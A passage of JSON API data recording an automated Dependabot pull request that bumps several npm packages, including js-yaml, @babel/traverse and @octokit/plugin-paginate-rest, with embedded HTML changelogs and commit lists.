href=\"https://redirect.github.com/expressjs/express/pull/5957\"\u003eexpressjs/express#5957\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: updated github actions ci workflow by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6323\"\u003eexpressjs/express#6323\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: reorder \u003ccode\u003enpm i\u003c/code\u003e steps to fix ci for older node versions by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6336\"\u003eexpressjs/express#6336\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBackport: ci: add node.js 24 to test matrix by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6506\"\u003eexpressjs/express#6506\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(4.x): wider range for query test skip by \u003ca href=\"https://github.com/jonchurch\"\u003e\u003ccode\u003e@​jonchurch\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6513\"\u003eexpressjs/express#6513\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003euse tilde notation for certain dependencies by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6905\"\u003eexpressjs/express#6905\u003c/a\u003e\u003c/li...\n\n_Description has been truncated_","html_url":"https://github.com/SherfeyInv/updater-action/pull/38","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/SherfeyInv%2Fupdater-action/issues/38","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/38/packages"}},{"old_version":"2.21.3","new_version":"14.0.0","update_type":"major","path":null,"pr_created_at":"2026-04-04T01:09:06.000Z","version_change":"2.21.3 → 14.0.0","issue":{"uuid":"4202847457","node_id":"PR_kwDOR14qvM7P5n7m","number":10,"state":"closed","title":"chore(deps): bump the npm_and_yarn group across 1 directory with 10 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-04-04T04:03:40.000Z","author_association":null,"state_reason":null,"created_at":"2026-04-04T01:09:06.000Z","updated_at":"2026-04-04T04:03:40.000Z","time_to_close":10474,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"npm_and_yarn","update_count":10,"packages":[{"name":"js-yaml","old_version":"4.1.0","new_version":"4.1.1","repository_url":"https://github.com/nodeca/js-yaml"},{"name":"js-yaml","old_version":"3.14.1","new_version":"3.14.2","repository_url":"https://github.com/nodeca/js-yaml"},{"name":"@babel/traverse","old_version":"7.21.5","new_version":"7.29.0","repository_url":"https://github.com/babel/babel"},{"name":"@octokit/plugin-paginate-rest","old_version":"2.21.3","new_version":"14.0.0","repository_url":"https://github.com/octokit/plugin-paginate-rest.js"},{"name":"@tootallnate/once","old_version":"1.1.2","new_version":"removed","repository_url":"https://github.com/TooTallNate/once"},{"name":"braces","old_version":"3.0.2","new_version":"3.0.3","repository_url":"https://github.com/micromatch/braces"},{"name":"flatted","old_version":"3.2.7","new_version":"3.4.2","repository_url":"https://github.com/WebReflection/flatted"},{"name":"minimatch","old_version":"3.1.2","new_version":"3.1.5","repository_url":"https://github.com/isaacs/minimatch"},{"name":"picomatch","old_version":"2.3.1","new_version":"2.3.2","repository_url":"https://github.com/micromatch/picomatch"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 8 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [js-yaml](https://github.com/nodeca/js-yaml) | `4.1.0` | `4.1.1` |\n| [js-yaml](https://github.com/nodeca/js-yaml) | `3.14.1` | `3.14.2` |\n| [@babel/traverse](https://github.com/babel/babel/tree/HEAD/packages/babel-traverse) | `7.21.5` | `7.29.0` |\n| [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js) | `2.21.3` | `14.0.0` |\n| [@tootallnate/once](https://github.com/TooTallNate/once) | `1.1.2` | `removed` |\n| [braces](https://github.com/micromatch/braces) | `3.0.2` | `3.0.3` |\n| [flatted](https://github.com/WebReflection/flatted) | `3.2.7` | `3.4.2` |\n| [minimatch](https://github.com/isaacs/minimatch) | `3.1.2` | `3.1.5` |\n| [picomatch](https://github.com/micromatch/picomatch) | `2.3.1` | `2.3.2` |\n\n\nUpdates `js-yaml` from 4.1.0 to 4.1.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/cc482e775913e6625137572a3712d2826170e53a\"\u003e\u003ccode\u003ecc482e7\u003c/code\u003e\u003c/a\u003e 4.1.1 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/50968b862e75866ef90e626572fe0b2f97b55f9f\"\u003e\u003ccode\u003e50968b8\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/d092d866031751cb27c12d93f3e2470ad74d678b\"\u003e\u003ccode\u003ed092d86\u003c/code\u003e\u003c/a\u003e lint fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/383665ff4248ec2192d1274e934462bb30426879\"\u003e\u003ccode\u003e383665f\u003c/code\u003e\u003c/a\u003e fix prototype pollution in merge (\u0026lt;\u0026lt;)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/0d3ca7a27b03a6c974790a30a89e456007d62976\"\u003e\u003ccode\u003e0d3ca7a\u003c/code\u003e\u003c/a\u003e README.md: HTTP =\u0026gt; HTTPS (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/678\"\u003e#678\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/49baadd52af887d2991e2c39a6639baa56d6c71b\"\u003e\u003ccode\u003e49baadd\u003c/code\u003e\u003c/a\u003e doc: 'empty' style option for !!null\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/ba3460eb9d3e4478edcbc29edabe17c2157fc9ce\"\u003e\u003ccode\u003eba3460e\u003c/code\u003e\u003c/a\u003e Fix demo link (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/618\"\u003e#618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/nodeca/js-yaml/compare/4.1.0...4.1.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `js-yaml` from 3.14.1 to 3.14.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/cc482e775913e6625137572a3712d2826170e53a\"\u003e\u003ccode\u003ecc482e7\u003c/code\u003e\u003c/a\u003e 4.1.1 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/50968b862e75866ef90e626572fe0b2f97b55f9f\"\u003e\u003ccode\u003e50968b8\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/d092d866031751cb27c12d93f3e2470ad74d678b\"\u003e\u003ccode\u003ed092d86\u003c/code\u003e\u003c/a\u003e lint fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/383665ff4248ec2192d1274e934462bb30426879\"\u003e\u003ccode\u003e383665f\u003c/code\u003e\u003c/a\u003e fix prototype pollution in merge (\u0026lt;\u0026lt;)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/0d3ca7a27b03a6c974790a30a89e456007d62976\"\u003e\u003ccode\u003e0d3ca7a\u003c/code\u003e\u003c/a\u003e README.md: HTTP =\u0026gt; HTTPS (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/678\"\u003e#678\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/49baadd52af887d2991e2c39a6639baa56d6c71b\"\u003e\u003ccode\u003e49baadd\u003c/code\u003e\u003c/a\u003e doc: 'empty' style option for !!null\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/ba3460eb9d3e4478edcbc29edabe17c2157fc9ce\"\u003e\u003ccode\u003eba3460e\u003c/code\u003e\u003c/a\u003e Fix demo link (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/618\"\u003e#618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/nodeca/js-yaml/compare/4.1.0...4.1.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@babel/traverse` from 7.21.5 to 7.29.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/babel/babel/releases\"\u003e\u003ccode\u003e@​babel/traverse\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.29.0 (2026-01-31)\u003c/h2\u003e\n\u003cp\u003eThanks \u003ca href=\"https://github.com/simbahax\"\u003e\u003ccode\u003e@​simbahax\u003c/code\u003e\u003c/a\u003e for your first PR!\u003c/p\u003e\n\u003ch4\u003e:rocket: New Feature\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-types\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17750\"\u003e#17750\u003c/a\u003e [7.x backport] Add attributes import declaration builder (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-standalone\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17663\"\u003e#17663\u003c/a\u003e [7.x backport] feat(standalone): export async transform (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17725\"\u003e#17725\u003c/a\u003e [7.x backport] feat: read standalone targets from data-targets (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17765\"\u003e#17765\u003c/a\u003e fix(parser): correctly parse type assertions in \u003ccode\u003eextends\u003c/code\u003e clause (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17723\"\u003e#17723\u003c/a\u003e [7.x backport] fix(parser): improve super type argument parsing (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-traverse\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17708\"\u003e#17708\u003c/a\u003e fix(traverse): provide a hub when traversing a File or Program and no parentPath is given (\u003ca href=\"https://github.com/simbahax\"\u003e\u003ccode\u003e@​simbahax\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-block-scoping\u003c/code\u003e, \u003ccode\u003ebabel-traverse\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17737\"\u003e#17737\u003c/a\u003e [7.x backport] fix: Rename switch discriminant references when body creates shadowing variable (\u003ca href=\"https://github.com/magic-akari\"\u003e\u003ccode\u003e@​magic-akari\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:running_woman: Performance\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-generator\u003c/code\u003e, \u003ccode\u003ebabel-runtime-corejs3\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17642\"\u003e#17642\u003c/a\u003e [Babel 7] Improve generator performance (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 6\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eDavid (\u003ca href=\"https://github.com/simbahax\"\u003e\u003ccode\u003e@​simbahax\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNicolò Ribaudo (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/magic-akari\"\u003e\u003ccode\u003e@​magic-akari\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.28.6 (2026-01-12)\u003c/h2\u003e\n\u003cp\u003eThanks \u003ca href=\"https://github.com/kadhirash\"\u003e\u003ccode\u003e@​kadhirash\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/kolvian\"\u003e\u003ccode\u003e@​kolvian\u003c/code\u003e\u003c/a\u003e for your first PRs!\u003c/p\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-cli\u003c/code\u003e, \u003ccode\u003ebabel-code-frame\u003c/code\u003e, \u003ccode\u003ebabel-core\u003c/code\u003e, \u003ccode\u003ebabel-helper-check-duplicate-nodes\u003c/code\u003e, \u003ccode\u003ebabel-helper-fixtures\u003c/code\u003e, \u003ccode\u003ebabel-helper-plugin-utils\u003c/code\u003e, \u003ccode\u003ebabel-node\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-flow-comments\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-modules-commonjs\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-property-mutators\u003c/code\u003e, \u003ccode\u003ebabel-preset-env\u003c/code\u003e, \u003ccode\u003ebabel-traverse\u003c/code\u003e, \u003ccode\u003ebabel-types\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17589\"\u003e#17589\u003c/a\u003e Improve Unicode handling in code-frame tokenizer (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-regenerator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17556\"\u003e#17556\u003c/a\u003e fix: \u003ccode\u003etransform-regenerator\u003c/code\u003e correctly handles scope (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-react-jsx\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17538\"\u003e#17538\u003c/a\u003e fix: Keep jsx comments (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:nail_care: Polish\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e, \u003ccode\u003ebabel-standalone\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17606\"\u003e#17606\u003c/a\u003e Polish(standalone): improve message on invalid preset/plugin (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:house: Internal\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-bugfix-v8-static-class-fields-redefine-readonly\u003c/code\u003e, \u003ccode\u003ebabel-plugin-proposal-decorators\u003c/code\u003e, \u003ccode\u003ebabel-plugin-proposal-import-attributes-to-assertions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-proposal-import-wasm-source\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-async-do-expressions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-decorators\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-destructuring-private\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-do-expressions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-explicit-resource-management\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-export-default-from\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-flow\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-function-bind\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-function-sent\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-import-assertions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-import-attributes\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-import-defer\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-import-source\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-jsx\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-module-blocks\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-optional-chaining-assign\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-partial-application\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-pipeline-operator\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-throw-expressions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-typescript\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-async-generator-functions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-async-to-generator\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-class-properties\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-class-static-block\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-dotall-regex\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-duplicate-named-capturing-groups-regex\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-explicit-resource-management\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-exponentiation-operator\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-json-strings\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-logical-assignment-operators\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-nullish-coalescing-operator\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-numeric-separator\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-object-rest-spread\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-optional-catch-binding\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-optional-chaining\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-private-methods\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-private-property-in-object\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-regexp-modifiers\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-unicode-property-regex\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-unicode-sets-regex\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17580\"\u003e#17580\u003c/a\u003e Allow Babel 8 in compatible Babel 7 plugins (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/aa8394e454337d118ac3d40bfa3ee1a3cb3f3ed2\"\u003e\u003ccode\u003eaa8394e\u003c/code\u003e\u003c/a\u003e v7.29.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/84366a8ea453814e732784db74cf2e2b6635eb6f\"\u003e\u003ccode\u003e84366a8\u003c/code\u003e\u003c/a\u003e fix(traverse): provide a hub when traversing a File or Program and no parentP...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/229eb452c5d5d2be0dc138ec2956aff7ff1057d7\"\u003e\u003ccode\u003e229eb45\u003c/code\u003e\u003c/a\u003e [7.x backport] fix: Rename switch discriminant references when body creates s...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/d7f400889567ae18ef9ac41b024b5120f6060e17\"\u003e\u003ccode\u003ed7f4008\u003c/code\u003e\u003c/a\u003e v7.28.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/905bc22b2fff23673eabe467815c67b29bf8bba2\"\u003e\u003ccode\u003e905bc22\u003c/code\u003e\u003c/a\u003e fix: lint errors in main branch (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17612\"\u003e#17612\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/a03e2b63ae530674e866b60350b7eb4a5fcb5f59\"\u003e\u003ccode\u003ea03e2b6\u003c/code\u003e\u003c/a\u003e fix: \u003ccode\u003epath.evaluate\u003c/code\u003e correctly returns \u003ccode\u003econfident\u003c/code\u003e (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17584\"\u003e#17584\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/aac2c37e11ad58905f7f9606103074e80bacbbcd\"\u003e\u003ccode\u003eaac2c37\u003c/code\u003e\u003c/a\u003e chore: Use Gulpfile.mts (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17579\"\u003e#17579\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/65c4a6b3ee0e1d32801529e841572bb22534e1f3\"\u003e\u003ccode\u003e65c4a6b\u003c/code\u003e\u003c/a\u003e [Babel 8] fix: Improve \u003ccode\u003etraverse\u003c/code\u003e types (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17574\"\u003e#17574\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/99dcba5e71de3bd81ce14077cfa5b6df58e9b177\"\u003e\u003ccode\u003e99dcba5\u003c/code\u003e\u003c/a\u003e chore: enable some ts-eslint rules (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17592\"\u003e#17592\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/c92c4919771105140015167f25f7bacac77c90d9\"\u003e\u003ccode\u003ec92c491\u003c/code\u003e\u003c/a\u003e Improve Unicode handling in code-frame tokenizer (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17589\"\u003e#17589\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/babel/babel/commits/v7.29.0/packages/babel-traverse\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by [GitHub Actions](\u003ca href=\"https://www.npmjs.com/~GitHub\"\u003ehttps://www.npmjs.com/~GitHub\u003c/a\u003e Actions), a new releaser for \u003ccode\u003e@​babel/traverse\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/plugin-paginate-rest` from 2.21.3 to 14.0.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/releases\"\u003e\u003ccode\u003e@​octokit/plugin-paginate-rest\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev14.0.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.2.1...v14.0.0\"\u003e14.0.0\u003c/a\u003e (2025-10-31)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd immutable releases, enterprise team membership, enterprise team organization endpoints (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/413e8990ce34854cb3a7d22f8a7366ea6a1eb0d5\"\u003e413e899\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRemove \u003ccode\u003eGET /projects/{project_id}/columns\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eRemove \u003ccode\u003eGET /enterprises/{enterprise}/secret-scanning/alerts\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.2.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.2.0...v13.2.1\"\u003e13.2.1\u003c/a\u003e 